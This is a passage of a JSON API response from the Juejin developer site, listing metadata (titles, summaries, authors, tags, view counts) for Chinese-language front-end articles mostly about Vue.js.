"show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}], "user_interact": {"id": 6844903577224216590, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844904131451158536", "article_info": {"article_id": "6844904131451158536", "user_id": "817692384193470", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904131451158536", "cover_image": "", "is_gfw": 0, "title": "40.vue全解(起手式1)", "brief_content": "详细:组件不仅仅是要把模板的内容进行复用,更重要的是组件之间的通信,通常父组件的模板中包含子组件,父组件要向子组件传递数据或者参数,子组件接收到后根据参数的不同来进行对应的渲染。数据传递在vue组件可以通过props来实现", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1587272824", "mtime": "1598930979", "rtime": "1587273314", "draft_id": "6845076736011567118", "view_count": 550, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 27, "is_hot": 0, "rank_index": 0.00012974, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "817692384193470", "user_name": "y_cj", "company": "", "job_title": "前端菜鸡", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/770876b6b8b0d86c9191b222b1127241~300x300.image", "level": 2, "description": "", "followee_count": 2, "follower_count": 7, "post_article_count": 100, 
"digg_article_count": 3, "got_digg_count": 23, "got_view_count": 18104, "post_shortmsg_count": 1, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 204, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844904131451158536, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6972548822287417352", "article_info": {"article_id": "6972548822287417352", "user_id": "4212984289165853", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/94a7bc5c76ef414eacd9cf8229b49984~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "【Vue2.x 源码学习】第九篇 - 对象数据变化的观测情况", 
"brief_content": "【Vue2.x 源码学习】第九篇-对象数据变化的观测情况;实现了对象老属性值变更为对象、数组时的深层观测处理;结合实现原理,说明了对象新增属性不能被观测的原因,及如何实现数据观测;", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1623423288", "mtime": "1623473748", "rtime": "1623473748", "draft_id": "6972546541575733261", "view_count": 71, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00012972, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4212984289165853", "user_name": "BraveWang", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/e9463d73674c4d6bc05a763a63cb0dd3~300x300.image", "level": 2, "description": "源码学习中...组件库建设中...", "followee_count": 96, "follower_count": 22, "post_article_count": 81, "digg_article_count": 31, "got_digg_count": 44, "got_view_count": 5822, "post_shortmsg_count": 11, "digg_shortmsg_count": 10, "isfollowed": false, "favorable_author": 0, "power": 102, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", 
"back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6972548822287417352, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6936708299786190856", "article_info": {"article_id": "6936708299786190856", "user_id": "4037062427423959", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "SpringBoot+Vue豆宝社区前后端分离项目手把手实战系列教程14---帖子列表分页功能实现", "brief_content": "本项目实战教程配有免费视频教程,配套代码完全开源。手把手从零开始搭建一个目前应用最广泛的Springboot+Vue前后端分离多用户社区项目。本项目难度适中,为便于大家学习,每一集视频教程对应在Github上的每一次提交。", "is_english": 0, "is_original": 1, "user_index": 2.49491483101579, "original_type": 0, "original_author": "", "content": "", "ctime": "1615079777", "mtime": "1615097715", "rtime": "1615097715", "draft_id": "6929764264882208782", "view_count": 88, "collect_count": 2, "digg_count": 1, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00012971, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4037062427423959", "user_name": "豆约翰", "company": "home", "job_title": "teacher", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/b811e305c83f965db8afd6481284725e~300x300.image", "level": 2, "description": "宠辱不惊,看庭前花开花落;去留无意,望天上云卷云舒", "followee_count": 20, 
"follower_count": 39, "post_article_count": 64, "digg_article_count": 85, "got_digg_count": 76, "got_view_count": 12715, "post_shortmsg_count": 4, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 201, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6936708299786190856, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6947969424921985031", "article_info": {"article_id": "6947969424921985031", "user_id": "3641226811678344", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "el-tree数据回显,解决子级部分选中,父级全选效果", "brief_content": "在el-tree中回显数据有一个很明显的坑,只要回显的数据里有父级的id,不管当前父级下的子级是部分选中还是全选,父级的check效果都是全选。 
我看了很多博主说用setChecked循环便利来勾选叶子节点,但我试了半天也没用,setTimeout,nextTick都试了,无效…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1617700214", "mtime": "1617701858", "rtime": "1617701858", "draft_id": "6947969148676898824", "view_count": 92, "collect_count": 0, "digg_count": 2, "comment_count": 0, "hot_index": 6, "is_hot": 0, "rank_index": 0.00012969, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3641226811678344", "user_name": "阿狸要吃吃的", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/a61c139e97180974032d075c5316cfc2~300x300.image", "level": 1, "description": "vue 小程序 js,react", "followee_count": 5, "follower_count": 6, "post_article_count": 6, "digg_article_count": 12, "got_digg_count": 18, "got_view_count": 1454, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 32, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 
1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6947969424921985031, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6972757240411324447", "article_info": {"article_id": "6972757240411324447", "user_id": "2023559627027486", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue CLI", "brief_content": "初识Vue CLI Vue CLI的使用 Vue CLI 2 创建项目 项目目录结构 runtimecompiler和runtimeonly的区别 同时新建两个项目,左为配置了runtimecompi", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1623471877", "mtime": "1623476554", "rtime": "1623475855", "draft_id": "6972052080076783629", "view_count": 74, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00012955, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2023559627027486", "user_name": "Mengxixi", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/6d18b638e352dd76965224698ccc5f61~300x300.image", "level": 1, "description": "天天摸鱼学前端的烟酒生", "followee_count": 3, "follower_count": 2, "post_article_count": 5, "digg_article_count": 8, "got_digg_count": 8, "got_view_count": 735, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 15, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, 
"select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6972757240411324447, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6892582663765377038", "article_info": {"article_id": "6892582663765377038", "user_id": "2348212570302903", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue数据响应式、模板解析的实现原理(实现一个简易的Vue)", "brief_content": "在上方,我们把模板解析和数据响应分成2个方法去执行。但是他们相互之间没有关联的话怎么去实现页面和数据同步呢?", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": 
"1604804695", "mtime": "1604825041", "rtime": "1604805933", "draft_id": "6892581897105473543", "view_count": 204, "collect_count": 0, "digg_count": 2, "comment_count": 2, "hot_index": 14, "is_hot": 0, "rank_index": 0.00012928, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2348212570302903", "user_name": "Rawsdom", "company": "", "job_title": "前端", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/e32461f34ee41a879c2cb35ba30afbe0~300x300.image", "level": 1, "description": "", "followee_count": 6, "follower_count": 3, "post_article_count": 5, "digg_article_count": 2, "got_digg_count": 12, "got_view_count": 2254, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 34, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6892582663765377038, "omitempty": 2, "user_id": 0, 
"is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903640432377869", "article_info": {"article_id": "6844903640432377869", "user_id": "1239904844807000", "category_id": "6809637767543259144", "tag_ids": [6809640357354012685, 6809640369764958215, 6809640407484334093, 6809640782329282567], "visible_level": 0, "link_url": "https://juejin.im/post/6844903640432377869", "cover_image": "", "is_gfw": 0, "title": "vue、react隐式实例化", "brief_content": "这是一篇几个月前写的文章,那时候理解也不是特别透彻,但还是搬运到掘金发一遍。 可以看的出来,我们的需求是想有一个组件能像html原生的alert一样,在需要的地方能够直接去调用,而不是需要把message组件写进节点中。 react相当明显地创建了一个class,vue表面上好…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1531928938", "mtime": "1598460085", "rtime": "1531991639", "draft_id": "6845075577213288461", "view_count": 1006, "collect_count": 17, "digg_count": 27, "comment_count": 0, "hot_index": 77, "is_hot": 0, "rank_index": 0.00012923, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1239904844807000", "user_name": "limengke123", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/df4206fcdb9ed6905637d98f855b1633~300x300.image", "level": 2, "description": "", "followee_count": 40, "follower_count": 23, "post_article_count": 6, "digg_article_count": 177, "got_digg_count": 250, "got_view_count": 20614, "post_shortmsg_count": 0, "digg_shortmsg_count": 14, "isfollowed": false, "favorable_author": 0, "power": 456, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, 
"is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546490, "tag_id": "6809640357354012685", "tag_name": "React.js", "color": "#61DAFB", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/f655215074250f10f8d4.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234367, "mtime": 1631692935, "id_type": 9, "tag_alias": "", "post_article_count": 16999, "concern_user_count": 226420}, {"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546798, "tag_id": "6809640782329282567", "tag_name": "iView", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/dfe71e5ba82cc7796831.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1488860237, "mtime": 1631432548, "id_type": 9, "tag_alias": "", "post_article_count": 222, "concern_user_count": 6788}], "user_interact": {"id": 6844903640432377869, "omitempty": 
2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6854573213632954375", "article_info": {"article_id": "6854573213632954375", "user_id": "1679709498776280", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6854573213632954375", "cover_image": "", "is_gfw": 0, "title": "Vue.js源码学习(完结)-虚拟DOM的patch算法", "brief_content": "虚拟DOM将虚拟节点vnode和旧虚拟节点oldVnode进行对比,得出真正需要更新的节点进行DOM操作。对两个虚拟节点进行对比是虚拟DOM中最核心的算法(即patch)。 由于Vue.js的变化侦测粒度很细,一定程度上可以知道哪些状态发生了变化,所以可以通过细粒度的绑定来更新…", "is_english": 0, "is_original": 1, "user_index": 2.7095112913515, "original_type": 0, "original_author": "", "content": "", "ctime": "1595317609", "mtime": "1599099496", "rtime": "1595336975", "draft_id": "6854812664749621256", "view_count": 330, "collect_count": 3, "digg_count": 2, "comment_count": 0, "hot_index": 18, "is_hot": 0, "rank_index": 0.00012914, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1679709498776280", "user_name": "小宝的挖机", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/638ceb6a3b77b2eef933e1c2996c07d2~300x300.image", "level": 2, "description": "", "followee_count": 7, "follower_count": 44, "post_article_count": 85, "digg_article_count": 151, "got_digg_count": 301, "got_view_count": 28172, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 585, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": 
{"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6854573213632954375, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903968791855111", "article_info": {"article_id": "6844903968791855111", "user_id": "3333374985120024", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844903968791855111", "cover_image": "", "is_gfw": 0, "title": "Electron + Vue + Vscode构建跨平台应用(四)利用Electron-Vue构建Vue应用详解", "brief_content": "主进程是指: 运行 package.json 里面 main 脚本的进程成为主进程。 渲染进程是指: 每个 electron 的页面都运行着自己的进程,称为渲染进程。 通俗的来讲主进程也就是 npm run start 出来的窗口,而窗口里面的内容,即是渲染进程。", "is_english": 0, "is_original": 1, "user_index": 0.003086090311724, "original_type": 0, "original_author": "", "content": "", "ctime": "1571301659", "mtime": "1600155867", "rtime": "1571324971", "draft_id": "6845076499368771597", "view_count": 804, "collect_count": 3, "digg_count": 0, "comment_count": 0, "hot_index": 40, "is_hot": 0, "rank_index": 0.00012898, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": 
{"user_id": "3333374985120024", "user_name": "Yi_Master", "company": "", "job_title": "", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/1/15/160f773f2b9fda91~tplv-t2oaga2asx-image.image", "level": 2, "description": "移动端App,Framework,JS等", "followee_count": 0, "follower_count": 24, "post_article_count": 14, "digg_article_count": 0, "got_digg_count": 12, "got_view_count": 14458, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 156, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844903968791855111, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903518344577037", "article_info": {"article_id": "6844903518344577037", "user_id": 
"3474112473989448", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809640398105870343, 6809640403516522504], "visible_level": 0, "link_url": "https://github.com/berwin/Blog/issues/17", "cover_image": "", "is_gfw": 0, "title": "深入浅出 - vue变化侦测原理", "brief_content": "一年前我写过一篇 响应式原理的文章,但是最近我发现讲的内容和我现在心里想的有些不太一样,所以我重写一篇文章。 我的目标是能让读者读完我写的文章能学到知识,有一部分文章标题都以深入浅出开头,目的是把一个复杂的东西排除掉干扰学习的因素后剩下的核心原理通过很简单的描述来让读者学习到知识", "is_english": 0, "is_original": 0, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1512356773", "mtime": "1598438903", "rtime": "1512356773", "draft_id": "0", "view_count": 719, "collect_count": 24, "digg_count": 51, "comment_count": 11, "hot_index": 97, "is_hot": 0, "rank_index": 0.00012888, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3474112473989448", "user_name": "玖五", "company": "阿里巴巴 - 淘系技术部", "job_title": "前端技术专家", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/6e896367e48d45745bc6362bf2ec6cdb~300x300.image", "level": 3, "description": "畅销书《深入浅出Vue.js》作者,负责阿里淘系大促(天猫双11,618等)主会场终端渲染架构,双11大促消防员👨🚒、中专毕业、95后。\n\n爱好:写作、金融,飙各种交通工具(🚴♀️🛴🏍️🚗),滑雪🏂\n\nGitHub:github.com/berwin", "followee_count": 30, "follower_count": 2934, "post_article_count": 27, "digg_article_count": 41, "got_digg_count": 1624, "got_view_count": 71863, "post_shortmsg_count": 10, "digg_shortmsg_count": 23, "isfollowed": false, "favorable_author": 0, "power": 2099, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": 
